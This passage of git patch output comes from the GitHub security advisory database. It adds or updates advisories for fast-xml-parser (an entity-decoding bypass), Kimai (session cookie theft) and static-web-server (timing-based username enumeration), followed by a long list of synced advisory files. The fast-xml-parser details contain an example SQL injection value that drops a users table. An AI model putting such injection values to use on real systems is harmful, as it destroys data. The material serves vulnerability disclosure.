* FROM t WHERE name='O'; DROP TABLE users;--Brien'\n```\n\n## Impact\n\nThis is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.\n\n- Default config, no special options\n- Attacker can replace any `<` / `>` / `&` / `"` / `'` with arbitrary strings\n- Direct XSS vector when parsed XML content is rendered in a page\n- v5 and v6 both affected\n\n## Suggested fix\n\nEscape regex metacharacters before constructing the replacement regex:\n\n```js\nconst escaped = entityName.replace(/[.*+?^${}()|[\\]\\\\]/g, '\\\\$&');\nentities[entityName] = {\n regx: RegExp(`&${escaped};`, \"g\"),\n val: val\n};\n```\n\nFor v6, add `.` to the blacklist in `validateEntityName`:\n\n```js\nconst specialChar = \"!?\\\\/[].{}^&*()<>|+\";\n```\n\n## Severity\n\nEntity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "fast-xml-parser" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.3" + }, + { + "fixed": "5.3.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2" + }, + { + "type": "WEB", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e" + }, + { + "type": "WEB", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69" + }, + { + "type": "PACKAGE", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser" + }, + { + "type": "WEB", + "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-185" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T18:23:54Z", + "nvd_published_at": null + } +} \ No newline at end of file From 5c53a256b8dced5ac1beb8f00ffe323e89a380fd Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 18:27:01 +0000 Subject: [PATCH 14/77] Publish Advisories GHSA-cv8h-r7r5-vwj9 GHSA-qhp6-635j-x7r2 --- .../GHSA-cv8h-r7r5-vwj9.json | 35 ++++++++--- .../GHSA-qhp6-635j-x7r2.json | 61 +++++++++++++++++++ 2 files changed, 89 insertions(+), 7 deletions(-) rename advisories/{unreviewed => github-reviewed}/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json (65%) create mode 100644 advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json diff --git a/advisories/unreviewed/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json b/advisories/github-reviewed/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json similarity index 65% rename from advisories/unreviewed/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json rename to advisories/github-reviewed/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json index 438810181f5a8..c61bf6e4afedb 100644 --- a/advisories/unreviewed/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json +++ b/advisories/github-reviewed/2025/12/GHSA-cv8h-r7r5-vwj9/GHSA-cv8h-r7r5-vwj9.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-cv8h-r7r5-vwj9", - "modified": "2025-12-19T21:30:20Z", + "modified": "2026-02-20T18:25:02Z", "published": "2025-12-19T21:30:20Z", "aliases": [ "CVE-2023-53957" ], + "summary": "Kimai contains a SameSite cookie vulnerability", "details": "Kimai 1.30.10 contains a SameSite cookie vulnerability that allows attackers to steal user session cookies through malicious exploitation. Attackers can trick victims into executing a crafted PHP script that captures and writes session cookie information to a file, enabling potential session hijacking.", "severity": [ { @@ -14,18 +15,38 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "kimai/kimai" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.30.10" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-53957" }, { - "type": "WEB", - "url": "https://github.com/kimai/kimai/releases/tag/1.30.10" + "type": "PACKAGE", + "url": "https://github.com/kimai/kimai" }, { "type": "WEB", @@ -41,8 +62,8 @@ "CWE-1275" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T18:25:02Z", "nvd_published_at": "2025-12-19T21:15:52Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json b/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json new file mode 100644 index 0000000000000..e0bc2d82f86bd --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qhp6-635j-x7r2", + "modified": "2026-02-20T18:25:27Z", + "published": "2026-02-20T18:25:27Z", + "aliases": [ + "CVE-2026-27480" + ], + "summary": "Static Web Server affected by timing-based username enumeration in Basic Authentication due to early response on invalid usernames", + "details": "## Summary\n\nA Timing-based username enumeration in Basic Authentication vulnerability due to early response on invalid usernames could allow attackers to identify valid users and focus their efforts on targeted brute-force or credential-stuffing attacks.\n\n## Details\n\nSWS validates the provided username before performing any password verification.\n- **Invalid Username:** The server returns a `401 Unauthorized` response immediately.\n- **Valid Username:** The server proceeds to verify the password (e.g., using `bcrypt`), which introduces a different execution path and measurable timing discrepancy.\n\nThis allows an attacker to distinguish between existing and non-existing accounts by analyzing response times.\n\n## PoC\n\nThe following statistical results were obtained by measuring the mean response time over 100 iterations using a custom Rust script:\n\n| User Type | Average Response Time |\n| :--- | :--- |\n| **Invalid User** | 0.409861 ms |\n| **Valid User** | 0.250925 ms |\n| **Difference** | **~0.158936 ms** |\n\nWhile the valid user responded faster in this specific test environment, the statistically significant gap confirms that the authentication logic does not execute in constant time.\n\n## Impact\n\nUsers using the SWS' Basic Authentication feature are primarily impacted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "static-web-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.1.0" + }, + { + "fixed": "2.41.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/static-web-server/static-web-server/security/advisories/GHSA-qhp6-635j-x7r2" + }, + { + "type": "WEB", + "url": "https://github.com/static-web-server/static-web-server/commit/7bf0fd425eb10dac9bf9ef5febce12c4dd039ce1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/static-web-server/static-web-server" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-204" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T18:25:27Z", + "nvd_published_at": null + } +} \ No newline at end of file From 2112e7a0ac18e485eaba6eccdb40734e46363e43 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 18:33:05 +0000 Subject: [PATCH 15/77] Advisory Database Sync --- .../GHSA-h2w9-p5qf-qmrh.json | 1 + .../GHSA-mj4r-rpwm-gg33.json | 10 +++- .../GHSA-7365-jmqc-qf8w.json | 3 +- .../GHSA-23vm-r6m3-8q9g.json | 31 ++++++++++ .../GHSA-256m-r39j-gmcw.json | 31 ++++++++++ .../GHSA-279c-6crv-5wxc.json | 31 ++++++++++ .../GHSA-27v4-jx99-gfh6.json | 11 +++- .../GHSA-28ww-g7m4-w94r.json | 31 ++++++++++ .../GHSA-29xg-2j5g-mj8g.json | 31 ++++++++++ .../GHSA-2c3x-rrq4-j7xg.json | 31 ++++++++++ .../GHSA-2cpq-4q56-fghm.json | 11 +++- .../GHSA-2cv8-fr2g-g66g.json | 31 ++++++++++ .../GHSA-2fcj-pq3f-v8fp.json | 11 +++- .../GHSA-2rf2-f6mm-2232.json | 31 ++++++++++ .../GHSA-2rfp-jrr8-m33f.json | 11 +++- .../GHSA-2v7m-mcj3-m7h7.json | 31 ++++++++++ .../GHSA-2wf2-988r-jv99.json | 31 ++++++++++ .../GHSA-2whc-3gm8-r8v3.json | 31 ++++++++++ .../GHSA-2x2g-fcpp-7fr9.json | 36 +++++++++++ .../GHSA-343f-9rcg-8p42.json | 31 ++++++++++ .../GHSA-37wf-f6wc-vqj8.json | 31 ++++++++++ .../GHSA-38fx-8cr9-9925.json | 31 ++++++++++ .../GHSA-38gw-g59j-rr5c.json | 36 +++++++++++ .../GHSA-3cmc-gqgq-xmxq.json | 11 +++- .../GHSA-3fr7-jch8-4qjv.json | 40 +++++++++++++ .../GHSA-3g7r-h8fj-xc5g.json | 31 ++++++++++ .../GHSA-3h5g-fffj-jhx9.json | 31 ++++++++++ .../GHSA-3mfv-m4f8-5m67.json | 31 ++++++++++ .../GHSA-3pw3-vpq3-qmc9.json | 31 ++++++++++ .../GHSA-3r56-xx7r-cr9c.json | 31 ++++++++++ .../GHSA-3rcg-gg9q-9688.json | 31 ++++++++++ .../GHSA-3rhf-g27v-qpj7.json | 31 ++++++++++ .../GHSA-3v2x-94p8-whg9.json | 11 +++- .../GHSA-3vr9-ghwq-fh8h.json | 40 +++++++++++++ .../GHSA-42h9-mr3g-6gc2.json | 29 +++++++++ .../GHSA-42qj-j5qx-4j25.json | 48 +++++++++++++++ .../GHSA-42vx-f9wx-wg3r.json | 36 +++++++++++ .../GHSA-43rm-rg7w-7rjf.json | 31 ++++++++++ .../GHSA-43ww-vg8r-97hv.json | 31 ++++++++++ .../GHSA-46ph-2qpx-729g.json | 31 ++++++++++ .../GHSA-47ph-88gx-hg42.json | 52 ++++++++++++++++ .../GHSA-48pc-4fq3-jhwg.json | 31 ++++++++++ .../GHSA-4cfj-pm5j-9qhf.json | 11 +++- .../GHSA-4f62-jjjx-4hrr.json | 31 ++++++++++ .../GHSA-4fcf-69p7-63vf.json | 60 +++++++++++++++++++ .../GHSA-4ff7-6hm2-x86r.json | 31 ++++++++++ .../GHSA-4fwr-9c58-jg7x.json | 31 ++++++++++ .../GHSA-4ggr-f4xw-9446.json | 31 ++++++++++ .../GHSA-4gvf-3g6g-c2mg.json | 31 ++++++++++ .../GHSA-4mjj-m5cc-rchc.json | 11 +++- .../GHSA-4pmf-68jr-9pq2.json | 31 ++++++++++ .../GHSA-4pmr-jmj5-4gwv.json | 31 ++++++++++ .../GHSA-4qvw-ghv2-2gg4.json | 31 ++++++++++ .../GHSA-4r8w-crc8-mqph.json | 31 ++++++++++ .../GHSA-4wc7-crf4-r645.json | 31 ++++++++++ .../GHSA-5284-5qqc-v2w8.json | 31 ++++++++++ .../GHSA-536p-mw62-6cm4.json | 31 ++++++++++ .../GHSA-53q4-966f-vpp2.json | 36 +++++++++++ .../GHSA-56wx-rr26-54fr.json | 31 ++++++++++ .../GHSA-57gh-h62q-5fwp.json | 31 ++++++++++ .../GHSA-57vf-72qj-2828.json | 31 ++++++++++ .../GHSA-58h5-w6gx-q297.json | 31 ++++++++++ .../GHSA-58p5-8f5p-8qqg.json | 31 ++++++++++ .../GHSA-58qh-jxh9-rvp5.json | 31 ++++++++++ .../GHSA-5h9r-fr4c-2vwr.json | 31 ++++++++++ .../GHSA-5j3p-mg5x-539j.json | 31 ++++++++++ .../GHSA-5ppr-f7g3-89cw.json | 31 ++++++++++ .../GHSA-5w67-c6pv-hmpq.json | 31 ++++++++++ .../GHSA-5xcj-44v8-p2v3.json | 56 +++++++++++++++++ .../GHSA-5xr7-h2jm-xhr2.json | 31 ++++++++++ .../GHSA-6262-6vhm-9x8v.json | 31 ++++++++++ .../GHSA-62hw-x3qq-c7vv.json | 40 +++++++++++++ .../GHSA-62jc-vj7m-2q9x.json | 31 ++++++++++ .../GHSA-62mp-mc96-vv2w.json | 31 ++++++++++ .../GHSA-63pr-8qvw-vfv9.json | 31 ++++++++++ .../GHSA-63v8-38hf-jrfm.json | 31 ++++++++++ .../GHSA-6562-26mh-56xr.json | 31 ++++++++++ .../GHSA-66q7-4wcm-7r85.json | 31 ++++++++++ .../GHSA-6c3h-gxfp-37vm.json | 11 +++- .../GHSA-6frj-85f5-897h.json | 31 ++++++++++ .../GHSA-6fwh-vwxr-5jrw.json | 31 ++++++++++ .../GHSA-6g49-x6hq-6rmq.json | 31 ++++++++++ .../GHSA-6qvx-865f-qrhf.json | 31 ++++++++++ .../GHSA-6rr6-99p5-684x.json | 31 ++++++++++ .../GHSA-6v87-78cw-pw29.json | 31 ++++++++++ .../GHSA-6vfc-pv6m-f4jg.json | 11 +++- .../GHSA-733c-qhrf-7cmm.json | 31 ++++++++++ .../GHSA-752x-86hx-w73c.json | 31 ++++++++++ .../GHSA-7689-4fm5-8xxm.json | 40 +++++++++++++ .../GHSA-76g3-wv5g-g883.json | 31 ++++++++++ .../GHSA-7cjr-h9q5-mgrf.json | 31 ++++++++++ .../GHSA-7f73-hx35-rw45.json | 31 ++++++++++ .../GHSA-7gx4-4vpm-w576.json | 31 ++++++++++ .../GHSA-7qvf-m2xc-hg57.json | 31 ++++++++++ .../GHSA-82j5-hm8j-jwhq.json | 44 ++++++++++++++ .../GHSA-877x-j2fm-2mw5.json | 31 ++++++++++ .../GHSA-87jc-9r3r-58w8.json | 40 +++++++++++++ .../GHSA-8c32-hp76-8f35.json | 31 ++++++++++ .../GHSA-8f2p-qrq8-3vpg.json | 31 ++++++++++ .../GHSA-8g2j-5xh3-r35m.json | 11 +++- .../GHSA-8m92-8r47-wxqw.json | 60 +++++++++++++++++++ .../GHSA-8p6j-8fq8-23rr.json | 31 ++++++++++ .../GHSA-8p85-wjp4-3w4m.json | 33 ++++++++++ .../GHSA-8x43-j6j7-q6vg.json | 29 +++++++++ .../GHSA-97cw-r9qf-j9qh.json | 11 +++- .../GHSA-97g7-x3h6-6ccc.json | 31 ++++++++++ .../GHSA-97hf-p3f7-pjq2.json | 31 ++++++++++ .../GHSA-988g-r4v6-j68v.json | 36 +++++++++++ .../GHSA-9crc-72v8-4jmj.json | 31 ++++++++++ .../GHSA-9jmq-xgjm-p8c2.json | 33 ++++++++++ .../GHSA-9mr9-pcmg-4xr7.json | 31 ++++++++++ .../GHSA-9vr5-8j2w-55f6.json | 31 ++++++++++ .../GHSA-9w4h-qf26-hvrv.json | 31 ++++++++++ .../GHSA-c27m-jc6r-9c95.json | 31 ++++++++++ .../GHSA-c29h-3pp8-76hf.json | 31 ++++++++++ .../GHSA-c49j-5m2h-224g.json | 31 ++++++++++ .../GHSA-c4mr-3p9j-gxmj.json | 11 +++- .../GHSA-c4qg-fgx5-7xg5.json | 29 +++++++++ .../GHSA-c88w-mqr9-prrr.json | 31 ++++++++++ .../GHSA-cchw-3fjc-4266.json | 11 +++- .../GHSA-cf7g-cxh2-5vhr.json | 31 ++++++++++ .../GHSA-cg8f-pcpw-6836.json | 31 ++++++++++ .../GHSA-chqg-r72f-gcgr.json | 31 ++++++++++ .../GHSA-cjp5-2c5h-3735.json | 36 +++++++++++ .../GHSA-cm5v-8jg4-g44j.json | 31 ++++++++++ .../GHSA-cq45-jm56-f2cg.json | 31 ++++++++++ .../GHSA-crh6-h7h3-f48v.json | 31 ++++++++++ .../GHSA-cvjq-fp7r-7jf7.json | 31 ++++++++++ .../GHSA-cvm5-m63f-8wmv.json | 31 ++++++++++ .../GHSA-f29p-m33v-73cj.json | 31 ++++++++++ .../GHSA-f3xp-j3c9-999x.json | 31 ++++++++++ .../GHSA-f647-638r-hxrw.json | 11 +++- .../GHSA-f6p8-2gf3-784r.json | 31 ++++++++++ .../GHSA-f6pr-2mv6-45fq.json | 31 ++++++++++ .../GHSA-f8c9-f59w-g5cx.json | 31 ++++++++++ .../GHSA-fc39-6hhj-gr5p.json | 31 ++++++++++ .../GHSA-fg97-672q-6chv.json | 31 ++++++++++ .../GHSA-fqrw-hvqv-r58w.json | 33 ++++++++++ .../GHSA-g3qj-5j85-8w2c.json | 31 ++++++++++ .../GHSA-g5wr-mqvx-5c3v.json | 31 ++++++++++ .../GHSA-gcfc-fjf7-2pj9.json | 36 +++++++++++ .../GHSA-gfrr-w669-mfpw.json | 40 +++++++++++++ .../GHSA-gj5f-4c2g-54hq.json | 60 +++++++++++++++++++ .../GHSA-gmmc-3vpq-7m4c.json | 31 ++++++++++ .../GHSA-gpx9-88hq-9x47.json | 31 ++++++++++ .../GHSA-gq95-fxhv-hvcp.json | 11 +++- .../GHSA-gv3f-578r-jhf3.json | 31 ++++++++++ .../GHSA-gv8w-m9x9-cvqj.json | 60 +++++++++++++++++++ .../GHSA-gvgc-7vpx-c4jp.json | 31 ++++++++++ .../GHSA-gxg3-7vjc-h392.json | 31 ++++++++++ .../GHSA-h886-6wvm-63qx.json | 31 ++++++++++ .../GHSA-h8g5-mfv5-4rp9.json | 31 ++++++++++ .../GHSA-h8h3-mqvc-hwrf.json | 31 ++++++++++ .../GHSA-h93r-xq5m-hv3w.json | 29 +++++++++ .../GHSA-h94h-v9gq-74g7.json | 31 ++++++++++ .../GHSA-hc23-qvrh-v59g.json | 31 ++++++++++ .../GHSA-hc97-m5vw-hgpf.json | 31 ++++++++++ .../GHSA-hrxh-f933-qcp6.json | 11 +++- .../GHSA-hx9h-rh37-jg32.json | 31 ++++++++++ .../GHSA-j368-q2mr-vhv4.json | 31 ++++++++++ .../GHSA-j3pj-q5qg-g2r8.json | 31 ++++++++++ .../GHSA-j4g8-p5xf-cx8j.json | 31 ++++++++++ .../GHSA-j69g-gh5p-j2j3.json | 31 ++++++++++ .../GHSA-jcgh-3xqc-4hgp.json | 31 ++++++++++ .../GHSA-jf9p-r93v-rw24.json | 31 ++++++++++ .../GHSA-jhr5-g8vv-6x3q.json | 31 ++++++++++ .../GHSA-jjpv-2mhh-mcmm.json | 31 ++++++++++ .../GHSA-jvrv-rj6m-mfm6.json | 31 ++++++++++ .../GHSA-jw2g-7q64-j48j.json | 11 +++- .../GHSA-jw2x-9qxr-2w9w.json | 52 ++++++++++++++++ .../GHSA-jxq5-ggfq-q36w.json | 31 ++++++++++ .../GHSA-m23x-mm6q-4qg4.json | 31 ++++++++++ .../GHSA-m69x-7wp8-6gjv.json | 31 ++++++++++ .../GHSA-m78j-wv7w-r94w.json | 31 ++++++++++ .../GHSA-mgwj-pxgv-5r8r.json | 31 ++++++++++ .../GHSA-mhqr-8rx2-jw82.json | 31 ++++++++++ .../GHSA-mhvh-7hfw-2pcj.json | 31 ++++++++++ .../GHSA-mj24-8cx9-5wc8.json | 31 ++++++++++ .../GHSA-mj7j-8qcf-454p.json | 31 ++++++++++ .../GHSA-mj9g-3f37-7qv2.json | 31 ++++++++++ .../GHSA-mq7f-f783-pc94.json | 31 ++++++++++ .../GHSA-mqj4-m7cg-hx46.json | 31 ++++++++++ .../GHSA-mrcv-7mr4-vfm5.json | 31 ++++++++++ .../GHSA-mrp6-8q86-qp29.json | 31 ++++++++++ .../GHSA-mvfm-p427-8c26.json | 31 ++++++++++ .../GHSA-mvmh-gv2w-6hrm.json | 31 ++++++++++ .../GHSA-mvp7-2m2r-2548.json | 31 ++++++++++ .../GHSA-mwrf-hg69-6h5g.json | 31 ++++++++++ .../GHSA-mxq6-8688-3xc6.json | 11 +++- .../GHSA-p2m5-3j38-g6mj.json | 36 +++++++++++ .../GHSA-p2vq-xhgq-wqqr.json | 31 ++++++++++ .../GHSA-p3w5-jrj2-m9r6.json | 31 ++++++++++ .../GHSA-p52x-wxj2-j8jr.json | 31 ++++++++++ .../GHSA-p57f-h2f5-67v8.json | 31 ++++++++++ .../GHSA-p69v-gqh4-hg9p.json | 31 ++++++++++ .../GHSA-p95v-rww3-j83p.json | 31 ++++++++++ .../GHSA-pf6r-4hv7-pr4f.json | 31 ++++++++++ .../GHSA-pfgm-6983-f589.json | 29 +++++++++ .../GHSA-pg4q-7rh5-52c9.json | 40 +++++++++++++ .../GHSA-pj5w-7j3v-9wwv.json | 31 ++++++++++ .../GHSA-pjx3-8fqj-x6hr.json | 31 ++++++++++ .../GHSA-pm2j-978g-6g85.json | 36 +++++++++++ .../GHSA-pm69-54qr-cgv7.json | 31 ++++++++++ .../GHSA-pmgj-wpmq-6xx5.json | 31 ++++++++++ .../GHSA-pq2q-m7vr-7342.json | 31 ++++++++++ .../GHSA-pq9c-2qch-jgmw.json | 31 ++++++++++ .../GHSA-prpx-gw6q-vpv2.json | 31 ++++++++++ .../GHSA-pw6c-r98f-r37w.json | 31 ++++++++++ .../GHSA-px76-q5p2-wfgw.json | 11 +++- .../GHSA-pxxq-rvgm-p9rp.json | 31 ++++++++++ .../GHSA-q2ch-643m-222m.json | 36 +++++++++++ .../GHSA-q2q8-xrr4-fqjh.json | 11 +++- .../GHSA-q577-6r28-hw22.json | 31 ++++++++++ .../GHSA-q682-57gm-p99w.json | 31 ++++++++++ .../GHSA-q6xg-x4rx-4p97.json | 31 ++++++++++ .../GHSA-q8m6-hjhf-m246.json | 11 +++- .../GHSA-q8wg-gw6g-8c93.json | 29 +++++++++ .../GHSA-qfwf-756h-2p4g.json | 3 +- .../GHSA-qq6w-x794-mfrc.json | 31 ++++++++++ .../GHSA-qqj5-wp73-78fr.json | 31 ++++++++++ .../GHSA-qv9f-wvw4-25rj.json | 31 ++++++++++ .../GHSA-qvpj-hxx2-jj7g.json | 31 ++++++++++ .../GHSA-qx85-r5h6-jm6f.json | 31 ++++++++++ .../GHSA-r5c8-59gv-v4x8.json | 31 ++++++++++ .../GHSA-r8fr-76pj-5h7j.json | 31 ++++++++++ .../GHSA-rf9x-x7wj-42rg.json | 11 +++- .../GHSA-rfpg-r65c-g86m.json | 31 ++++++++++ .../GHSA-rhvr-p49q-rhmm.json | 31 ++++++++++ .../GHSA-rjh6-2p75-696h.json | 31 ++++++++++ .../GHSA-rm7g-73m3-759p.json | 31 ++++++++++ .../GHSA-rmj8-x3h3-24rh.json | 31 ++++++++++ .../GHSA-rp93-gq4p-8r62.json | 29 +++++++++ .../GHSA-rr5c-93pp-mqfv.json | 31 ++++++++++ .../GHSA-rr5p-xfmq-r2vx.json | 36 +++++++++++ .../GHSA-rrpc-76pm-5w54.json | 31 ++++++++++ .../GHSA-rv4c-25xc-4f6g.json | 31 ++++++++++ .../GHSA-rvcv-xmp5-qv44.json | 31 ++++++++++ .../GHSA-rw2x-9m7j-wvrx.json | 31 ++++++++++ .../GHSA-rw5q-r997-qm48.json | 31 ++++++++++ .../GHSA-rw72-9mv7-cr6q.json | 11 +++- .../GHSA-rxjp-cgw5-jfcg.json | 40 +++++++++++++ .../GHSA-v36c-x4c4-8wx6.json | 31 ++++++++++ .../GHSA-v534-r4rj-rcvf.json | 31 ++++++++++ .../GHSA-v5q2-22j2-xvp3.json | 31 ++++++++++ .../GHSA-v6m3-2f65-r5x7.json | 48 +++++++++++++++ .../GHSA-v6x7-wpp7-g26g.json | 31 ++++++++++ .../GHSA-v754-wvf3-33xx.json | 31 ++++++++++ .../GHSA-v76h-ch32-xfcr.json | 31 ++++++++++ .../GHSA-v859-79r4-4vv5.json | 31 ++++++++++ .../GHSA-v9wq-4qj2-xvh4.json | 31 ++++++++++ .../GHSA-vf3m-rggr-vh64.json | 31 ++++++++++ .../GHSA-vf83-6p8j-54f5.json | 11 +++- .../GHSA-vg7x-9fx9-rhfv.json | 36 +++++++++++ .../GHSA-vhgp-3x24-vh98.json | 31 ++++++++++ .../GHSA-vjvc-9fxm-2xw8.json | 31 ++++++++++ .../GHSA-vmwq-q997-3c46.json | 31 ++++++++++ .../GHSA-vp2m-r3pp-p859.json | 31 ++++++++++ .../GHSA-vph5-6p6f-8xpf.json | 31 ++++++++++ .../GHSA-vv37-5fmc-w362.json | 11 +++- .../GHSA-vxf7-pjj6-wh93.json | 31 ++++++++++ .../GHSA-w246-2vcp-75v8.json | 40 +++++++++++++ .../GHSA-w2hw-vq92-cm3x.json | 31 ++++++++++ .../GHSA-w7wv-fvvq-ppfp.json | 31 ++++++++++ .../GHSA-wf36-8q2p-m2xg.json | 31 ++++++++++ .../GHSA-wfqx-2rhq-j78p.json | 31 ++++++++++ .../GHSA-wfqx-gw86-rc8h.json | 31 ++++++++++ .../GHSA-wg3c-3523-f9fc.json | 31 ++++++++++ .../GHSA-wgg5-6gv9-fvpp.json | 31 ++++++++++ .../GHSA-wh7w-625p-7j85.json | 11 +++- .../GHSA-wm24-gwfw-426w.json | 31 ++++++++++ .../GHSA-wm24-v2x8-m9pj.json | 31 ++++++++++ .../GHSA-wq4c-m266-6c9g.json | 11 +++- .../GHSA-wqcv-67x3-mx26.json | 31 ++++++++++ .../GHSA-wqpx-frj2-7xmj.json | 36 +++++++++++ .../GHSA-wrqv-46c5-q67w.json | 31 ++++++++++ .../GHSA-wv4q-94jw-h996.json | 31 ++++++++++ .../GHSA-ww4h-gqqf-68h9.json | 60 +++++++++++++++++++ .../GHSA-wxg7-qr4v-6w49.json | 31 ++++++++++ .../GHSA-x25m-mgjq-j9gg.json | 31 ++++++++++ .../GHSA-x57h-c6qr-3m4q.json | 31 ++++++++++ .../GHSA-x648-6h35-89x6.json | 11 +++- .../GHSA-x6m2-4qvv-ghf6.json | 31 ++++++++++ .../GHSA-xcg8-79j4-g746.json | 31 ++++++++++ .../GHSA-xcv9-r62w-jh9r.json | 31 ++++++++++ .../GHSA-xf4f-qj26-72pf.json | 33 ++++++++++ .../GHSA-xfxx-38qx-mrf4.json | 31 ++++++++++ .../GHSA-xg7c-7v8p-8ww8.json | 31 ++++++++++ .../GHSA-xgmj-j94q-46cv.json | 31 ++++++++++ .../GHSA-xp6f-p933-2gqg.json | 6 +- .../GHSA-xq4j-x39q-xhqm.json | 36 +++++++++++ .../GHSA-xrpj-w92h-g66g.json | 31 ++++++++++ .../GHSA-xv8f-556c-h484.json | 31 ++++++++++ 292 files changed, 8653 insertions(+), 91 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-23vm-r6m3-8q9g/GHSA-23vm-r6m3-8q9g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-256m-r39j-gmcw/GHSA-256m-r39j-gmcw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-28ww-g7m4-w94r/GHSA-28ww-g7m4-w94r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-29xg-2j5g-mj8g/GHSA-29xg-2j5g-mj8g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2c3x-rrq4-j7xg/GHSA-2c3x-rrq4-j7xg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2cv8-fr2g-g66g/GHSA-2cv8-fr2g-g66g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2rf2-f6mm-2232/GHSA-2rf2-f6mm-2232.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2wf2-988r-jv99/GHSA-2wf2-988r-jv99.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2x2g-fcpp-7fr9/GHSA-2x2g-fcpp-7fr9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json create mode 100644 advisories/unreviewed/2026/02/GHSA-37wf-f6wc-vqj8/GHSA-37wf-f6wc-vqj8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json create mode 100644 advisories/unreviewed/2026/02/GHSA-38gw-g59j-rr5c/GHSA-38gw-g59j-rr5c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3fr7-jch8-4qjv/GHSA-3fr7-jch8-4qjv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3h5g-fffj-jhx9/GHSA-3h5g-fffj-jhx9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3mfv-m4f8-5m67/GHSA-3mfv-m4f8-5m67.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3pw3-vpq3-qmc9/GHSA-3pw3-vpq3-qmc9.json create mode 100644 